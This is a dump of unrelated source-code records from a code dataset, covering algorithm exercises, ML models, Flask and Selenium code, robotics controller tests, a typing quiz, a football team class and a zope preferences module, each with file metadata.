方法:先定义一个函数,使用中心扩散法寻找从i,j位置开始的最长子串,j = i 或者i + 1,这是考虑到奇数和偶数两种情况,使用函数减少代码的重复\n# # 然后遍历一次数组判断以i位置为中心找到的最大回文\n#\n#\n# class Solution:\n# def longestPalindrome(self, s: str) -> str:\n# def helper(s, i, j):\n# while i >= 0 and j < len(s) and s[i] == s[j]:\n# i -= 1\n# j += 1\n# return s[i + 1: j]\n# res = ''\n# for i 
in range(len(s)):\n# tmp = helper(s, i, i)\n# if len(tmp) > len(res):\n# res = tmp\n# tmp = helper(s, i, i + 1)\n# if len(tmp) > len(res):\n# res = tmp\n# return res\n\n\nif __name__ == '__main__':\n test = 'babad'\n a = Solution()\n print(a.longestPalindrome(test))","sub_path":"python/Day2/longestpalindrome.py","file_name":"longestpalindrome.py","file_ext":"py","file_size_in_byte":2271,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"280192424","text":"import math\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nimport sys\nimport os\nfile_path = os.path.dirname(__file__)\nsys.path.append(os.path.join(file_path, '../../super_module'))\nsys.path.append(os.path.join(file_path, '../'))\nsys.path.append(file_path)\nimport super_class\nimport wideresnet_super as wrnsuper\n\n\nclass WideResNet(wrnsuper.WideResNetSuper, super_class.DeepOriginalModel):\n rank_accumulator = 0\n def __init__(self, depth, num_classes, ConvF=nn.Conv2d, LinearF=nn.Linear, ranks=None, widen_factor=1, dropRate=0.0):\n super(WideResNet, self).__init__(\n depth=depth, \n num_classes=num_classes, \n ConvF=ConvF, \n LinearF=LinearF, \n ranks=ranks, \n widen_factor=widen_factor, \n dropRate=dropRate\n )\n\n\nif __name__ == \"__main__\":\n net = WideResNet(depth=16, num_classes=10, ranks=None, widen_factor=8, dropRate=0.4)\n y = net(torch.randn(1,3,32,32))\n print(y.size())","sub_path":"svhn/wrn/wideresnet_dense.py","file_name":"wideresnet_dense.py","file_ext":"py","file_size_in_byte":997,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"13852248","text":"## own files\nfrom config import mysql\nfrom extensions import * \n\nlogout_controller = Blueprint('logout', __name__)\n\n@logout_controller.route(\"/logout\", methods = [\"GET\", \"POST\"])\ndef logoutpage():\n\tuser = session.get('username')\n\tsession.clear()\n\tif (user != None):\n\t\tflash(user + \" has logged out successfully!\", 'Success')\n\treturn redirect(url_for('login.loginpage'))\n","sub_path":"logout.py","file_name":"logout.py","file_ext":"py","file_size_in_byte":370,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"67986849","text":"import re\nimport unittest\nimport time\n\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.support.wait import WebDriverWait\n\nfrom lib.general import login, get_browser\n\n\nclass HW1_Tests(unittest.TestCase):\n def setUp(self):\n driver = get_browser()\n url = \"http://hrm.seleniumminutes.com\"\n driver.get(url)\n\n self.wait = WebDriverWait(driver, 10)\n login(driver)\n self.driver = driver\n\n def tearDown(self):\n self.driver.quit()\n\n def test_quick_launch_menu(self):\n expected_img_name = {\n 'Assign Leave': 'ApplyLeave',\n 'Leave List': 'MyLeave',\n 'Timesheets': 'MyTimesheet',\n 'Apply Leave': 'ApplyLeave',\n 'My Leave': 'MyLeave',\n 'My Timesheet': 'MyTimesheet',\n }\n\n driver = self.driver\n\n quick_launch_menu = driver.find_element_by_class_name('quickLaungeContainer')\n all_quick_links = quick_launch_menu.find_elements_by_class_name('quickLinkText')\n\n for link in all_quick_links:\n img_name = self.extract_img_name(\n link.find_element_by_xpath('.//preceding-sibling::img').get_attribute(\n 'src'))\n assert expected_img_name[link.text] == img_name, \\\n \"Expected the image name above the {link_text}\" \\\n \" 
link to be {expected_img_name}, but it was\" \\\n \" {actual_img_name} instead\".format(\n link_text=link.text,\n expected_img_name=expected_img_name[link.text],\n actual_img_name=img_name)\n\n def test_pim_row_style(self):\n driver = self.driver\n driver.find_element_by_id('menu_pim_viewPimModule').click()\n # self.wait.until(EC.visibility_of_element_located((By.CLASS_NAME, 'odd')))\n all_rows = driver.find_elements_by_css_selector('tbody>tr')\n time.sleep(1)\n for i, row in enumerate(all_rows, 1):\n message = 'Expect the style of row #{0} to be {1}, but it was {2}'\n row_style = row.get_attribute('class')\n if i%2 == 1:\n assert row_style == 'odd', message.format(i, 'odd', row_style)\n else:\n assert row_style == 'even', message.format(i, 'even', row_style)\n\n\n def extract_img_name(self, src):\n return re.search('.*/(\\w+?).png', src).group(1)\n\n\nif __name__ == \"__main__\":\n unittest.main()","sub_path":"EllieSkobelPythonGithub/homework/quickLaungeContainerTest.py","file_name":"quickLaungeContainerTest.py","file_ext":"py","file_size_in_byte":2564,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"211931260","text":"from __future__ import print_function\n\nimport numpy as np\nfrom dynamic_graph.sot_talos_balance.foot_force_difference_controller import (\n FootForceDifferenceController,\n)\nfrom numpy.testing import assert_almost_equal\n\ncontroller = FootForceDifferenceController(\"footController\")\ncontroller.init()\n\ncontroller.dfzAdmittance.value = 1.0\ncontroller.vdcFrequency.value = 0.0\ncontroller.vdcDamping.value = 0.0\n\ngainSwing = 1.0\ngainStance = 2.0\ngainDouble = 3.0\n\ncontroller.wrenchRight.value = np.array([0.0] * 2 + [500.0] + [0.0] * 3)\ncontroller.wrenchLeft.value = np.array([0.0] * 2 + [300.0] + [0.0] * 3)\ncontroller.wrenchRightDes.value = np.array([0.0] * 2 + [400.0] + [0.0] * 3)\ncontroller.wrenchLeftDes.value = np.array([0.0] * 2 + [400.0] + [0.0] * 3)\n\ncontroller.gainSwing.value = gainSwing\ncontroller.gainStance.value = gainStance\ncontroller.gainDouble.value = gainDouble\n\nprint(\"---- Input ----\")\nprint(\"wrenchRight: %s\" % str(controller.wrenchRight.value))\nprint(\"wrenchLeft: %s\" % str(controller.wrenchLeft.value))\nprint(\"wrenchRightDes: %s\" % str(controller.wrenchRightDes.value))\nprint(\"wrenchLeftDes: %s\" % str(controller.wrenchLeftDes.value))\nprint()\n\nprint(\"gainSwing: %s\" % str(controller.gainSwing.value))\nprint(\"gainStance: %s\" % str(controller.gainStance.value))\nprint(\"gainDouble: %s\" % str(controller.gainDouble.value))\nprint()\n\nprint(\"---- Double support ----\")\n\ncontroller.phase.value = 0\n\ncontroller.posRightDes.value = np.eye(4)\ncontroller.posLeftDes.value = np.eye(4)\ncontroller.posRight.value = np.eye(4)\ncontroller.posLeft.value = np.eye(4)\n\ncontroller.vRight.recompute(0)\ncontroller.vLeft.recompute(0)\ncontroller.gainRight.recompute(0)\ncontroller.gainLeft.recompute(0)\n\n# There is more pressure on the right foot.\n# Therefore, the right foot must go up to reduce it\nvRight = [0.0] * 2 + [100.0] + [0.0] * 3\nvLeft = [0.0] * 2 + [-100.0] + [0.0] * 3\n\nprint(\"Expected vRight: %s\" % str(vRight))\nprint(\"Actual vRight: %s\" % str(controller.vRight.value))\nprint(\"Expected vLeft: %s\" % str(vLeft))\nprint(\"Actual vLeft: %s\" % str(controller.vLeft.value))\nprint()\n\nassert_almost_equal(vRight, controller.vRight.value)\nassert_almost_equal(vLeft, controller.vLeft.value)\n\nprint(\"gainRight: %s\" % str(controller.gainRight.value))\nprint(\"gainLeft: 
%s\" % str(controller.gainLeft.value))\nprint()\n\nassert_almost_equal(gainDouble, controller.gainRight.value)\nassert_almost_equal(gainDouble, controller.gainLeft.value)\n\nprint(\"---- Left support ----\")\ncontroller.phase.value = 1\n\ncontroller.vRight.recompute(1)\ncontroller.vLeft.recompute(1)\ncontroller.gainRight.recompute(1)\ncontroller.gainLeft.recompute(1)\nprint(\"vRight: %s\" % str(controller.vRight.value))\nprint(\"vLeft: %s\" % str(controller.vLeft.value))\nprint()\n\nassert_almost_equal([0.0] * 6, controller.vRight.value)\nassert_almost_equal([0.0] * 6, controller.vLeft.value)\n\nprint(\"gainRight: %s\" % str(controller.gainRight.value))\nprint(\"gainLeft: %s\" % str(controller.gainLeft.value))\nprint()\n\nassert_almost_equal(gainSwing, controller.gainRight.value)\nassert_almost_equal(gainStance, controller.gainLeft.value)\n\nprint(\"---- Right support ----\")\ncontroller.phase.value = -1\n\ncontroller.vRight.recompute(2)\ncontroller.vLeft.recompute(2)\ncontroller.gainRight.recompute(2)\ncontroller.gainLeft.recompute(2)\nprint(\"vRight: %s\" % str(controller.vRight.value))\nprint(\"vLeft: %s\" % str(controller.vLeft.value))\nprint()\n\nassert_almost_equal([0.0] * 6, controller.vRight.value)\nassert_almost_equal([0.0] * 6, controller.vLeft.value)\n\nprint(\"gainRight: %s\" % str(controller.gainRight.value))\nprint(\"gainLeft: %s\" % str(controller.gainLeft.value))\nprint()\n\nassert_almost_equal(gainStance, controller.gainRight.value)\nassert_almost_equal(gainSwing, controller.gainLeft.value)\n","sub_path":"tests/python/test_foot_force_difference_controller.py","file_name":"test_foot_force_difference_controller.py","file_ext":"py","file_size_in_byte":3769,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"157486232","text":"from typing import Union, Optional\n\nimport numpy as np\n\nfrom ... import SpatialTransform\nfrom ....utils import to_tuple\nfrom ....data.subject import Subject\nfrom ....typing import TypeTripletInt\nfrom .crop_or_pad import CropOrPad\n\n\nclass EnsureShapeMultiple(SpatialTransform):\n \"\"\"Crop or pad an image to a shape that is a multiple of :math:`N`.\n\n Args:\n target_multiple: Tuple :math:`(w, h, d)`. 
If a single value :math:`n`\n is provided, then :math:`w = h = d = n`.\n method: Either ``'crop'`` or ``'pad'``.\n **kwargs: See :class:`~torchio.transforms.Transform` for additional\n keyword arguments.\n\n Example:\n >>> import torchio as tio\n >>> image = tio.datasets.Colin27().t1\n >>> image.shape\n (1, 181, 217, 181)\n >>> transform = tio.EnsureShapeMultiple(8, method='pad')\n >>> transformed = transform(image)\n >>> transformed.shape\n (1, 184, 224, 184)\n >>> transform = tio.EnsureShapeMultiple(8, method='crop')\n >>> transformed = transform(image)\n >>> transformed.shape\n (1, 176, 216, 176)\n >>> image_2d = image.data[..., :1]\n >>> image_2d.shape\n torch.Size([1, 181, 217, 1])\n >>> transformed = transform(image_2d)\n >>> transformed.shape\n torch.Size([1, 176, 216, 1])\n\n \"\"\"\n def __init__(\n self,\n target_multiple: Union[int, TypeTripletInt],\n *,\n method: Optional[str] = 'pad',\n **kwargs\n ):\n super().__init__(**kwargs)\n self.target_multiple = np.array(to_tuple(target_multiple, 3))\n if method not in ('crop', 'pad'):\n raise ValueError('Method must be \"crop\" or \"pad\"')\n self.method = method\n\n def apply_transform(self, subject: Subject) -> Subject:\n source_shape = np.array(subject.spatial_shape, np.uint16)\n function = np.floor if self.method == 'crop' else np.ceil\n integer_ratio = function(source_shape / self.target_multiple)\n target_shape = integer_ratio * self.target_multiple\n target_shape = np.maximum(target_shape, 1)\n return CropOrPad(target_shape.astype(int))(subject)\n","sub_path":"torchio/transforms/preprocessing/spatial/ensure_shape_multiple.py","file_name":"ensure_shape_multiple.py","file_ext":"py","file_size_in_byte":2211,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"445005659","text":"import linear_regression as rg\nimport dataprocessing as dp\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n# Loading training examples\nX = dp.load_data('linearX.csv')\ny = dp.load_data('linearY.csv')\n\nX = X.reshape((-1, 1))\n\n#Normalizing the training examples\nX, meu, sigma = dp.normalize(X)\n\n#Initialising parameters for gradient descent\nm, n = X.shape\ninit_theta = np.zeros(n + 1)\nepsilon = 1e-10\neta = [0.001, 0.005, 0.009, 0.013, 0.017]\ncolor = ['red', 'blue', 'green', 'yellow', 'magenta']\n\nplt.ion()\nfor i in range(len(eta)): \n# Executing gradient descent\n\ttheta, iterations, theta_history, cost_history = rg.linear_reg(X, y, init_theta, eta[i], epsilon)\n\tplt.plot(list(range(0, iterations + 1)), cost_history, color=color[i], label='eta = ' + str(eta[i]))\n\nplt.xlabel('iterations')\nplt.ylabel('Cost')\nplt.title('Cost vs iterations')\nplt.legend(loc=1)\nplt.show()\n\ninput('Enter to close:')","sub_path":"Assign1/learning_rate.py","file_name":"learning_rate.py","file_ext":"py","file_size_in_byte":897,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"258778664","text":"import sys\nimport random\nimport time\nimport os\nimport threading as thr\nimport asyncio\nimport sqlfunc\n\nMENU = {'1':10, '2':30, '3':50, '4':100, '5':sys.exit}\n\nclass EnKeyIn(sqlfunc.Sql_Create):\n \n def __init__(self):\n super().__init__()\n self.words = self.sql_find()\n self.complete_time = 0\n self.count_total = 0\n self.error_count = 0\n self.w_quan = 0\n self.error_rate = 0\n #self.judge_thread = 0\n self.time_start = 0\n self.time_end = 0\n\n def menu_select(self):\n ms = input('請選擇單字個數:')\n if ms in '1234':\n self.w_quan = MENU.get(ms)\n 
self.count_total = MENU.get(ms)\n self.word_quantity(MENU.get(ms))\n else:\n sys.exit()\n \n def word_quantity(self, quan):\n words_temp = random.sample(self.words, k=quan)\n self.time_start = time.time()\n while words_temp:\n try:\n wt = words_temp.pop()\n print()\n print(f\"單字:{wt[1]}\\n翻譯:{wt[2]}\")\n print()\n ei = self.en_input()\n if ei.lower() == wt[1].lower():\n print('ok')\n else:\n self.error_count += 1\n print('error') \n except AttributeError:\n self.error_count += 1\n print('error')\n self.time_end = time.time()\n self.evaluation()\n\n def en_input(self):\n w = input('輸入英文:')\n if w.isalpha():\n return w\n\n def evaluation(self):\n self.complete_time = self.time_end - self.time_start\n self.error_rate = self.error_count / self.w_quan\n print()\n print(f'花費時間:{self.complete_time:06.2f}')\n print(f'錯誤率:{self.error_rate:3.2%}')\n\n def total_average(self):\n pass\n \n\ndef display_ENT():\n act = 'clear' if sys.platform.startswith('linux') else 'cls'\n os.system(act)\n\n\ndef display_view(): \n print('=================')\n print('ENType')\n print('=================')\n print('1. 10個單字')\n print('2. 30個單字')\n print('3. 50個單字')\n print('4. 100個單字')\n print('5. 結束程式')\n print('=================')\n\n\ndisplay_view()\nobj = EnKeyIn()\nobj.menu_select()\n","sub_path":"test/EnType.py","file_name":"EnType.py","file_ext":"py","file_size_in_byte":2363,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"184408323","text":"\"\"\" Classes and functions for evaluating teams in the sim.\n\"\"\"\n\noffense_positions = [\"QB\", \"RB1\", \"RB2\", \"FB\", \"WR1\", \"WR2\", \"WR3\",\n \"WR4\", \"WR5\", \"TE1\", \"TE2\", \"LOT\", \"ROT\",\n \"LOG\", \"ROG\", \"C\"]\ndefense_positions = [\"LDE\", \"DT1\", \"DT2\", \"RDE\", \"LOLB\", \"ROLB\",\n \"ILB1\", \"ILB2\", \"CB1\", \"CB2\", \"CB3\", \"CB4\", \"FS\", \"SS\"]\n\nclass Team(object):\n \"\"\" Class for evaluating teams.\n \"\"\"\n\n def __init__(self, name):\n\n # team information\n self.name = name\n\n # player management\n self._players = []\n self._offense = {}\n self._defense = {}\n\n def __repr__(self):\n \"\"\" Representation of instance as a str.\n \"\"\"\n return self.name\n\n def get_players(self, position=None, field_position=None,\n on_field=None, return_dict=False):\n \"\"\" Returns list of players.\n \"\"\"\n\n # check inputs are sane\n if on_field not in [\"offense\", \"defense\", None]:\n raise ValueError(\"Invalid value for on_field:\", on_field)\n\n # if user wants dict with field positions\n if on_field == \"offense\" and return_dict is True:\n return self._offense\n elif on_field == \"defense\" and return_dict is True:\n return self._defense\n elif on_field is False and return_dict is True:\n raise ValueError(\"Must use return_dict with on_field equal True\")\n\n # get Players\n if on_field == \"offense\":\n players = self._offense.values()\n elif on_field == \"defense\":\n players = self._defense.values()\n else:\n players = self._players\n\n # get Players with specific position\n if position is not None:\n players = [p for p in players if p.position == position]\n\n # get Players with specific field position\n if field_position is not None:\n players = [p for p in players\n if p.field_position == field_position]\n\n return players\n\n def add_player(self, player, position=None):\n \"\"\" Adds Player to Team.\n \"\"\"\n if player not in self._players:\n self._players.append(player)\n if position is not None:\n self.sub_player(player, position)\n\n def sub_player(self, 
player_in, position, player_out=None):\n \"\"\" Subs Player in at a position for another Player.\n \"\"\"\n\n # check that inputs are sane\n if player_in not in self._players or \\\n (player_out not in self._players and player_out is not None):\n raise ValueError(\"Must add player to Team before substituting.\")\n\n # sub in Player\n if position in offense_positions:\n self._offense[position] = player_in\n possession = True\n elif position in defense_positions:\n self._defense[position] = player_in\n possession = False\n else:\n raise ValueError(\"Position is not in known lists:\", position)\n\n # sub out Player\n if possession and player_out is not None:\n position_out = [key for key, val in self._defense.iteritems()\n if val == player_out][0]\n del self._defense[position_out]\n\n # update field positions\n player_in.field_position = position\n if player_out is not None:\n player_out.field_position = None\n\n def get_ballhandler(self):\n \"\"\" Returns the Player with the ball.\n \"\"\"\n ballhandler = [p for p in self.get_players(on_field=\"offense\")\n if p.ball]\n if len(ballhandler) > 1:\n raise IndexError(\"Returned more than one ballhandler\")\n return ballhandler[0]\n","sub_path":"pysport/football/team.py","file_name":"team.py","file_ext":"py","file_size_in_byte":3763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"222738550","text":"\"\"\"\n\"\"\"\n\n\ndef test_wiki_models_new_version(session):\n \"\"\" creates a new version of the existing page.\n \"\"\"\n\n from pygameweb.wiki.models import Wiki\n link = 'somelink'\n wiki_entry = Wiki(link=link, title='some title', content='some content', latest=1)\n\n session.add(wiki_entry)\n session.commit()\n\n what_changed = 'changed some stuff'\n assert wiki_entry.id\n old_id = wiki_entry.id\n wiki_entry.new_version(session)\n wiki_entry.changes = what_changed\n session.commit()\n\n # we see we have a new database row.\n assert old_id != wiki_entry.id\n\n\n # double check it's ok when we query it.\n new_one = (session\n .query(Wiki)\n .filter(Wiki.link == link)\n .filter(Wiki.latest == 1)\n .first())\n assert new_one.changes == what_changed\n\n pages = (session\n .query(Wiki)\n .filter(Wiki.link == link)\n .all())\n\n assert len(pages) == 2\n assert [p.id for p in pages].count(old_id) == 1\n assert [p.latest for p in pages].count(1) == 1\n assert [p.latest for p in pages].count(0) == 1, 'the old one is there too with latest set to 0'\n","sub_path":"tests/functional/pygameweb/wiki/test_wiki_models.py","file_name":"test_wiki_models.py","file_ext":"py","file_size_in_byte":1170,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"258102593","text":"#!/usr/bin/env python3\r\n# -*- coding: utf-8 -*-\r\nfrom subprocess import PIPE, Popen, STDOUT\r\nimport chardet\r\nfrom sys import platform\r\n\r\n\r\nclass SubprocessExecute(object):\r\n @staticmethod\r\n def to_str(bytes_or_str: bytes) -> str:\r\n \"\"\"\r\n 把byte类型转换为str\r\n 查看的编码格式\r\n :param bytes_or_str: bytes数据\r\n :return: 返回字符串\r\n \"\"\"\r\n if isinstance(bytes_or_str, bytes):\r\n encoding_dic = chardet.detect(bytes_or_str)\r\n print(encoding_dic)\r\n encoding = encoding_dic[\"encoding\"]\r\n print(encoding)\r\n value = bytes_or_str.decode(encoding)\r\n # value = bytes_or_str.decode('utf-8')\r\n # value = bytes_or_str.decode('gbk')\r\n else:\r\n value = bytes_or_str\r\n # 先去除每一行末尾的制表符和换行符,然后再加上换行符,使写入文件中的内容不会有空行\r\n return value.strip() + \"\\n\"\r\n\r\n @staticmethod\r\n def 
to_str2(bytes_or_str):\r\n \"\"\"\r\n 把byte类型转换为str\r\n :param bytes_or_str: bytes数据\r\n :return: 返回字符串\r\n \"\"\"\r\n if isinstance(bytes_or_str, bytes):\r\n try:\r\n value = bytes_or_str.decode('utf-8')\r\n #\r\n except UnicodeDecodeError:\r\n value = bytes_or_str.decode('gbk')\r\n else:\r\n value = bytes_or_str\r\n\r\n return value\r\n\r\n @staticmethod\r\n def to_str3(bytes_or_str):\r\n \"\"\"\r\n 把byte类型转换为str\r\n :param bytes_or_str: bytes数据\r\n :return: 返回字符串\r\n \"\"\"\r\n if isinstance(bytes_or_str, bytes):\r\n if 'linux'.upper() in platform.upper():\r\n value = bytes_or_str.decode('utf-8')\r\n elif ('window' in platform) or ('win32' == platform):\r\n value = bytes_or_str.decode('gbk')\r\n else:\r\n value = bytes_or_str\r\n else:\r\n value = bytes_or_str\r\n\r\n return value\r\n\r\n def execute(self, cmd):\r\n \"\"\"\r\n 执行命令返回结果\r\n :param cmd: 命令\r\n :return: 返回输出\r\n \"\"\"\r\n res = Popen(cmd, shell=True, stdin=PIPE, stdout=PIPE, stderr=STDOUT)\r\n stderr = res.stderr\r\n stdout = res.stdout\r\n if stderr:\r\n # res_info = stderr.read().decode(\"gbk\")\r\n res_info = self.to_str3(stderr.read())\r\n else:\r\n # res_info = stdout.read().decode(\"gbk\")\r\n res_info = self.to_str3(stdout.read())\r\n\r\n return res_info\r\n\r\n\r\nif __name__ == '__main__':\r\n execute = SubprocessExecute()\r\n # execute.execute(\"python -V\")\r\n execute.execute(\"pip -V\")\r\n","sub_path":"test/subprocess test/command2.py","file_name":"command2.py","file_ext":"py","file_size_in_byte":2765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"623695357","text":"prices = [1, 2, 3, 2, 3]\r\n'''\r\nreturn = [4,3,1,1,0]\r\n다른 해법 : 최초로 더 낮은 값이 있는 경우, 인덱스 값 끼리 빼기\r\n'''\r\nanswer = []\r\n\r\nfor i in range(len(prices)):\r\n for j in range(i+1, len(prices)):\r\n if prices[i] > prices[j]:\r\n seconds = j - i\r\n answer.append(seconds)\r\n break\r\n if j == len(prices)-1:\r\n seconds = j - i\r\n answer.append(seconds)\r\nanswer.append(0)\r\n\r\nprint(answer)\r\n","sub_path":"python_programmers/stackque/stackque1.py","file_name":"stackque1.py","file_ext":"py","file_size_in_byte":481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"88616418","text":"n = 1001\nmid = n//2+1\ntotal = 1\nnum = 1\nfor i in range(1,mid):\n for j in range(4):\n num = num + 2*i\n print(num)\n total = total + num\nprint(total)","sub_path":"q28.py","file_name":"q28.py","file_ext":"py","file_size_in_byte":169,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"249398953","text":"# coding: utf-8\n# author: HotDogDevBr.\n# E-mail: hotdogdevbr@gmail.com.\n\"\"\"\n Escreva o programa (Listagem 4.5) e experimente alguns valores.alguns.\nVerifique se os resultados foram os mesmos do programa anterior (Listagem 4.3)\n\"\"\"\n# listagem 4.5\nidade = int(input(\"Digite a idade de seu carro: \"))\nif idade <= 3:\n print(\"Seu carro é novo\")\nelse:\n print(\"Seu carro é velho\")\n","sub_path":"Exercicios Livro Python/capitulo 4/exercicio 4.5.py","file_name":"exercicio 4.5.py","file_ext":"py","file_size_in_byte":385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"216112097","text":"##############################################################################\n#\n# Copyright (c) 2005 Zope Foundation and Contributors.\n# All Rights Reserved.\n#\n# This software is subject to the provisions of the Zope Public License,\n# Version 2.1 
(ZPL). A copy of the ZPL should accompany this distribution.\n# THIS SOFTWARE IS PROVIDED \"AS IS\" AND ANY AND ALL EXPRESS OR IMPLIED\n# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\n# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS\n# FOR A PARTICULAR PURPOSE.\n#\n##############################################################################\n\"\"\"User Preferences System\n\n\"\"\"\n__docformat__ = \"reStructuredText\"\nimport zope.component\nimport zope.component.hooks\nimport zope.interface\nfrom BTrees.OOBTree import OOBTree\nfrom zope.annotation.interfaces import IAnnotations\nfrom zope.container.interfaces import IReadContainer\nfrom zope.location import Location\nfrom zope.schema import getFields\nfrom zope.security.checker import Checker\nfrom zope.security.checker import CheckerPublic\nfrom zope.security.management import getInteraction\nfrom zope.traversing.interfaces import IContainmentRoot\n\nfrom zope.preference.interfaces import IDefaultPreferenceProvider\nfrom zope.preference.interfaces import IPreferenceCategory\nfrom zope.preference.interfaces import IPreferenceGroup\n\n\npref_key = 'zope.app.user.UserPreferences'\n\n\n@zope.interface.implementer(IPreferenceGroup, IReadContainer)\nclass PreferenceGroup(Location):\n \"\"\"A feature-rich ``IPreferenceGroup`` implementation.\n\n This class implements the\n \"\"\"\n\n # Declare attributes here, so that they are always available.\n __id__ = ''\n __schema__ = None\n __title__ = None\n __description__ = None\n\n def __init__(self, id, schema=None, title='', description='',\n isCategory=False):\n self.__id__ = id\n self.__schema__ = schema\n self.__title__ = title\n self.__description__ = description\n\n # The last part of the id is the name.\n self.__name__ = id.split('.')[-1]\n\n # Make sure this group provides all important interfaces.\n directlyProvided = ()\n if isCategory:\n directlyProvided += (IPreferenceCategory,)\n if schema:\n directlyProvided += (schema,)\n zope.interface.directlyProvides(self, directlyProvided)\n\n # Store the actual parent in ``__parent``. Usually we would just override\n # the property to an actual value during binding, but because we overrode\n # ``__setattr__`` this is not possible anymore.\n __parent = None\n\n @property\n def __parent__(self):\n return self.__parent if self.__parent is not None \\\n else zope.component.hooks.getSite()\n\n def __bind__(self, parent):\n clone = self.__class__.__new__(self.__class__)\n clone.__dict__.update(self.__dict__)\n clone.__parent = parent\n return clone\n\n def get(self, key, default=None):\n id = self.__id__ and self.__id__ + '.' 
+ key or key\n group = zope.component.queryUtility(IPreferenceGroup, id, default)\n if group is default:\n return default\n return group.__bind__(self)\n\n def items(self):\n cutoff = self.__id__ and len(self.__id__) + 1 or 0\n utilities = zope.component.getUtilitiesFor(IPreferenceGroup)\n return [(id[cutoff:], group.__bind__(self))\n for id, group in utilities\n if (id != self.__id__ and\n id.startswith(self.__id__) and\n id[cutoff:].find('.') == -1)]\n\n def __getitem__(self, key):\n \"\"\"See zope.container.interfaces.IReadContainer\"\"\"\n default = object()\n obj = self.get(key, default)\n if obj is default:\n raise KeyError(key)\n return obj\n\n def __contains__(self, key):\n \"\"\"See zope.container.interfaces.IReadContainer\"\"\"\n return self.get(key) is not None\n\n def keys(self):\n \"\"\"See zope.container.interfaces.IReadContainer\"\"\"\n return [id for id, group in self.items()]\n\n def __iter__(self):\n \"\"\"See zope.container.interfaces.IReadContainer\"\"\"\n return iter(self.values())\n\n def values(self):\n \"\"\"See zope.container.interfaces.IReadContainer\"\"\"\n return [group for _id, group in self.items()]\n\n def __len__(self):\n \"\"\"See zope.container.interfaces.IReadContainer\"\"\"\n return len(self.items())\n\n def __getattr__(self, key):\n # Try to find a sub-group of the given id\n group = self.get(key)\n if group is not None:\n return group\n\n # Try to find a preference of the given name\n if self.__schema__ and key in self.__schema__:\n marker = object()\n value = self.data.get(key, marker)\n if value is marker:\n # Try to find a default preference provider\n provider = zope.component.queryUtility(\n IDefaultPreferenceProvider,\n context=self\n )\n if provider is None:\n return self.__schema__[key].default\n defaultGroup = provider.getDefaultPreferenceGroup(self.__id__)\n return getattr(defaultGroup, key)\n return value\n\n # Nothing found, raise an attribute error\n raise AttributeError(\"'%s' is not a preference or sub-group.\" % key)\n\n def __setattr__(self, key, value):\n if self.__schema__ and key in self.__schema__:\n # Validate the value\n bound = self.__schema__[key].bind(self)\n bound.validate(value)\n # Assign value\n self.data[key] = value\n else:\n self.__dict__[key] = value\n # If the schema changed, we really need to change the security\n # checker as well.\n if key == '__schema__':\n checker = PreferenceGroupChecker(self)\n self.__dict__['__Security_checker__'] = checker\n\n def __delattr__(self, key):\n if self.__schema__ and key in self.__schema__:\n del self.data[key]\n else:\n del self.__dict__[key]\n\n @property\n def data(self):\n # TODO: what if we have multiple participations?\n principal = getInteraction().participations[0].principal\n ann = zope.component.getMultiAdapter((principal, self), IAnnotations)\n\n # If no preferences exist, create the root preferences object.\n if ann.get(pref_key) is None:\n ann[pref_key] = OOBTree()\n prefs = ann[pref_key]\n\n # If no entry for the group exists, create a new entry.\n if self.__id__ not in prefs.keys():\n prefs[self.__id__] = OOBTree()\n\n return prefs[self.__id__]\n\n\ndef PreferenceGroupChecker(instance):\n \"\"\"A function that generates a custom security checker.\n\n The attributes available in a preference group are dynamically generated\n based on the group schema and the available sub-groups. 
Thus, the\n permission dictionaries have to be generated at runtime and are unique for\n each preference group instance.\n \"\"\"\n read_perm_dict = {}\n write_perm_dict = {}\n\n # Make sure that the attributes from IPreferenceGroup and IReadContainer\n # are public.\n for attrName in ('__id__', '__schema__', '__title__', '__description__',\n 'get', 'items', 'keys', 'values',\n '__getitem__', '__contains__', '__iter__', '__len__'):\n read_perm_dict[attrName] = CheckerPublic\n\n # Make the attributes generated from the schema available as well.\n if instance.__schema__ is not None:\n for name in getFields(instance.__schema__):\n read_perm_dict[name] = CheckerPublic\n write_perm_dict[name] = CheckerPublic\n\n # Make all sub-groups available as well.\n for name in instance.keys():\n read_perm_dict[name] = CheckerPublic\n write_perm_dict[name] = CheckerPublic\n\n return Checker(read_perm_dict, write_perm_dict)\n\n\ndef UserPreferences(context=None):\n \"\"\"Adapts an ``ILocation`` object to the ``IUserPreferences`` interface.\"\"\"\n if context is None:\n context = zope.component.getSiteManager()\n rootGroup = zope.component.getUtility(IPreferenceGroup)\n rootGroup = rootGroup.__bind__(context)\n rootGroup.__name__ = '++preferences++'\n zope.interface.alsoProvides(rootGroup, IContainmentRoot)\n return rootGroup\n\n\nclass preferencesNamespace:\n \"\"\"Used to traverse to the root preferences group.\"\"\"\n\n def __init__(self, ob, request=None):\n self.context = 